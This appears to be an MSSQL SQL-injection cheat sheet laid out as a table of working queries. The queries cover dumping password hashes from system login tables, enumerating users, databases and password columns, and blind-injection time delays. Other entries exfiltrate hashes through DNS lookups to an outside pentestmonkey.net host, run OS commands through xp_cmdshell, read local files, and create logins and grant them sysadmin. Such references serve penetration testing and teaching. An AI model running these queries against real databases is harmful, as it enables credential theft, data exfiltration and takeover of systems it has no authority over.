
** some of the queries in the table below can only be run by an administrator (a member of the sysadmin server role, e.g. sa).
these are marked with "-- priv" at the end of the query. **

+---------------+---------------------------------------------------------------------------+
| version | select @@version |
|---------------|---------------------------------------------------------------------------|
| comments | select 1 -- comment |
| | select /*comment*/1 |
|---------------|---------------------------------------------------------------------------|
| | select user_name(); |
| | select system_user; |
| current user | select user; |
| | select loginame from master..sysprocesses where spid = @@spid |
|---------------|---------------------------------------------------------------------------|
| list users | select name from master..syslogins |
|---------------|---------------------------------------------------------------------------|
| | mssql2000: select name, password from master..sysxlogins -- priv |
| | |
| | select name, master.dbo.fn_varbintohexstr(password) |
| | from master..sysxlogins -- priv |
| list password | |
| hashes | mssql2005: select name, password_hash from |
| | master.sys.sql_logins -- priv |
| | |
| | select name + '-' + |
| | master.sys.fn_varbintohexstr(password_hash) |
| | from master.sys.sql_logins -- priv |
|---------------|---------------------------------------------------------------------------|
| | select is_srvrolemember('sysadmin'); -- is your account a sysadmin? |
| | returns 1 for true, 0 for false, null for invalid role. |
| | also try 'bulkadmin', 'systemadmin' and other values. |
| list dba | |
| accounts | |
| | select is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? |
| | returns 1 for true, 0 for false, null for invalid role/username. |
|---------------|---------------------------------------------------------------------------|
| current db | select db_name() |
|---------------|---------------------------------------------------------------------------|
| list | select name from master..sysdatabases; |
| databases | select db_name(n); -- for n = 0, 1, 2, ... |
|---------------|---------------------------------------------------------------------------|
| | select name from syscolumns where id = (select id from sysobjects where |
| | name = 'mytable'); -- for the current db only |
| | |
| list columns | select master..syscolumns.name, type_name(master..syscolumns.xtype) from |
| | master..syscolumns, master..sysobjects where |
| | master..syscolumns.id=master..sysobjects.id and |
| | master..sysobjects.name='sometable'; -- list column names |
| | and types for master..sometable |
|---------------|---------------------------------------------------------------------------|
| | select name from master..sysobjects where xtype = 'u'; |
| | (use xtype = 'v' for views) |
| | select name from someotherdb..sysobjects where xtype = 'u'; |
| | |
| list tables | select master..syscolumns.name, type_name(master..syscolumns.xtype) |
| | from master..syscolumns, master..sysobjects where |
| | master..syscolumns.id=master..sysobjects.id and |
| | master..sysobjects.name='sometable'; -- list column names and types |
| | for master..sometable |
|---------------|---------------------------------------------------------------------------|
| | -- nb: this example works only for the current database. |
| | if you want to search another db, you need to specify the db name |
| find tables | (e.g. replace sysobjects with mydb..sysobjects). |
| from | |
| column name | select sysobjects.name as tablename, syscolumns.name as columnname |
| | from sysobjects join syscolumns on sysobjects.id = syscolumns.id |
| | where sysobjects.xtype = 'u' and syscolumns.name like '%password%' -- |
| | this lists the table and column name for each column whose name contains 'password' |
|---------------|---------------------------------------------------------------------------|
| select | select top 1 name from (select top 9 name from master..syslogins |
| nth row | order by name asc) sq order by name desc -- gets 9th row |
|---------------|---------------------------------------------------------------------------|
|select nth char| select substring('abcd', 3, 1) -- returns c |
|---------------|---------------------------------------------------------------------------|
| bitwise and | select 6 & 2 -- returns 2 |
| | select 6 & 1 -- returns 0 |
|---------------|---------------------------------------------------------------------------|
| ascii value | select char(0x41) -- returns A |
| -> char | |
|---------------|---------------------------------------------------------------------------|
| char -> ascii | select ascii('A') -- returns 65 |
| value | |
|---------------|---------------------------------------------------------------------------|
| casting | select cast('1' as int); |
| | select cast(1 as char) |
|---------------|---------------------------------------------------------------------------|
| string | select 'a' + 'b' -- returns ab |
| concatenation | |
|---------------|---------------------------------------------------------------------------|
| if statement | if (1=1) select 1 else select 2 -- returns 1 |
|---------------|---------------------------------------------------------------------------|
|case statement | select case when 1=1 then 1 else 2 end -- returns 1 |
|---------------|---------------------------------------------------------------------------|
|avoiding quotes| select char(65)+char(66) -- returns AB |
|---------------|---------------------------------------------------------------------------|
| time delay | waitfor delay '0:0:5' -- pause for 5 seconds |
|---------------|---------------------------------------------------------------------------|
| | declare @host varchar(800); select @host = name from master..syslogins; |
| | exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); |
| | -- nonpriv, works on 2000 |
| | |
| | declare @host varchar(800); select @host = name + '-' + |
| make | master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' |
| dns requests | from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');|
| | -- priv, works on 2005 |
| | |
| | -- nb: concatenation is not allowed in calls to these sps, which is why we |
| | have to use @host. messy but necessary. |
| | -- also check out the dns tunnel feature of sqlninja |
|---------------|---------------------------------------------------------------------------|
| command | exec xp_cmdshell 'net user'; -- priv |
| execution | |
|---------------|---------------------------------------------------------------------------|
| local | create table mydata (line varchar(8000)); |
| file access | bulk insert mydata from 'c:\boot.ini'; |
| | drop table mydata; |
|---------------|---------------------------------------------------------------------------|
| hostname, ip | select host_name() |
|---------------|---------------------------------------------------------------------------|
| create users | exec sp_addlogin 'user', 'pass'; -- priv |
|---------------|---------------------------------------------------------------------------|
| drop users | exec sp_droplogin 'user'; -- priv |
|---------------|---------------------------------------------------------------------------|
| make user dba | exec master.dbo.sp_addsrvrolemember 'user', 'sysadmin; -- priv |
+---------------+---------------------------------------------------------------------------+